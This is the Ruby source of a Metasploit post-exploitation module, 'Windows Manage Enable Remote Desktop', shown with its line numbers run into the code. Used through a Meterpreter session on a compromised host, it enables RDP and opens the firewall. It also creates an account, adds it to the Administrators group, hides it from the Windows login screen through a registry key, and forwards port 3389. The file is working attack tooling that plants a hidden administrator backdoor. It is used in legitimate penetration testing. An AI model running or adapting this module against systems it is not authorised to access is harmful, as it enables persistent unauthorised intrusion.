Path: blob/master/modules/post/windows/manage/enable_rdp.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Accounts7include Msf::Post::Windows::Registry8include Msf::Post::Windows::Services9include Msf::Post::Windows::Priv10include Msf::Post::File1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Windows Manage Enable Remote Desktop',17'Description' => %q{18This module enables the Remote Desktop Service (RDP). It provides the options to create19an account and configure it to be a member of the Local Administrators and20Remote Desktop Users group. It can also forward the target's port 3389/tcp.21},22'License' => BSD_LICENSE,23'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],24'Platform' => [ 'win' ],25'SessionTypes' => [ 'meterpreter' ],26'Notes' => {27'Stability' => [CRASH_SAFE],28'SideEffects' => [CONFIG_CHANGES],29'Reliability' => []30}31)32)3334register_options(35[36OptString.new('USERNAME', [ false, 'The username of the user to create.' ]),37OptString.new('PASSWORD', [ false, 'Password for the user created.' ]),38OptBool.new('ENABLE', [ false, 'Enable the RDP Service and Firewall Exception.', true]),39OptBool.new('FORWARD', [ false, 'Forward remote port 3389 to local Port.', false]),40OptInt.new('LPORT', [ false, 'Local port to forward remote connection.', 3389])41]42)43end4445def run46if datastore['ENABLE'] || (datastore['USERNAME'] && datastore['PASSWORD'])47cleanup_rc = store_loot(48'host.windows.cleanup.enable_rdp',49'text/plain',50session,51'',52'enable_rdp_cleanup.rc',53'enable_rdp cleanup resource file'54)5556if datastore['ENABLE']57if is_admin?58enablerd(cleanup_rc)59enabletssrv(cleanup_rc)60else61print_error('Insufficient privileges, Remote Desktop Service was not modified')62end63end64if datastore['USERNAME'] && datastore['PASSWORD']65if is_admin?66addrdpusr(datastore['USERNAME'], datastore['PASSWORD'], cleanup_rc)67else68print_error('Insufficient privileges, account was not be created.')69end70end71if datastore['FORWARD']72print_status("Starting the port forwarding at local port #{datastore['LPORT']}")73client.run_cmd("portfwd add -L 0.0.0.0 -l #{datastore['LPORT']} -p 3389 -r 127.0.0.1")74end75print_status("For cleanup execute Meterpreter resource file: #{cleanup_rc}")76end77end7879def enablerd(cleanup_rc)80key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'81value = 'fDenyTSConnections'82begin83v = registry_getvaldata(key, value)84print_status 'Enabling Remote Desktop'85if v == 186print_status "\tRDP is disabled; enabling it ..."87registry_setvaldata(key, value, 0, 'REG_DWORD')88file_local_write(cleanup_rc, "reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"")89else90print_status "\tRDP is already enabled"91end92rescue StandardError => e93print_status("The following error was encountered: #{e.class} #{e}")94end95end9697def enabletssrv(cleanup_rc)98service_name = 'termservice'99srv_info = service_info(service_name)100begin101print_status 'Setting Terminal Services service startup mode'102if srv_info[:starttype] != START_TYPE_AUTO103print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..."104unless service_change_config(service_name, starttype: 'START_TYPE_AUTO') == Windows::Error::SUCCESS105print_error("\tUnable to change start type to Auto")106end107file_local_write(cleanup_rc, 'execute -H -f cmd.exe -a "/c sc config termservice start= disabled"')108if service_start(service_name) == Windows::Error::SUCCESS109print_good("\tRDP Service Started")110end111file_local_write(cleanup_rc, 'execute -H -f cmd.exe -a "/c sc stop termservice"')112else113print_status "\tTerminal Services service is already set to auto"114end115# Enabling Exception on the Firewall116print_status "\tOpening port in local firewall if necessary"117cmd_exec('netsh', 'firewall set service type = remotedesktop mode = enable', 30)118file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"")119rescue StandardError => e120print_status("The following error was encountered: #{e.class} #{e}")121end122end123124def addrdpusr(username, password, cleanup_rc)125print_status 'Setting user account for logon'126print_status "\tAdding User: #{username} with Password: #{password}"127begin128if check_user(username)129print_error("\tThe user #{username} already exists")130return131end132133rdu_sid = resolve_sid('S-1-5-32-555')134admin_sid = resolve_sid('S-1-5-32-544')135136if !rdu_sid[:mapped] || !admin_sid[:mapped]137print_error("\tThe Remote Desktop Users group is not mapped") if !rdu_sid[:mapped]138print_error("\tThe Administrators group is not mapped") if !admin_sid[:mapped]139print_error("\tNot adding user #{username}")140return141end142143rdu = rdu_sid[:name]144admin = admin_sid[:name]145146user_added = false147result = add_user(username, password)148if result['return'] == 0149user_added = true150elsif check_user(username)151user_added = true152end153154if user_added155file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")156print_status "\tAdding User: #{username} to local group '#{rdu}'"157add_members_localgroup(rdu, username)158159print_status "\tHiding user from Windows Login screen"160hide_user_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'161registry_setvaldata(hide_user_key, username, 0, 'REG_DWORD')162file_local_write(cleanup_rc, "reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")163print_status "\tAdding User: #{username} to local group '#{admin}'"164add_members_localgroup(admin, username)165print_status 'You can now login with the created user'166else167print_error('Account could not be created')168print_error('Error:')169addusr_out.each_line do |l|170print_error("\t#{l.chomp}")171end172end173rescue StandardError => e174print_status("The following error was encountered: #{e.class} #{e}")175end176end177178def check_user(user)179enum_user.include?(user)180end181end182183184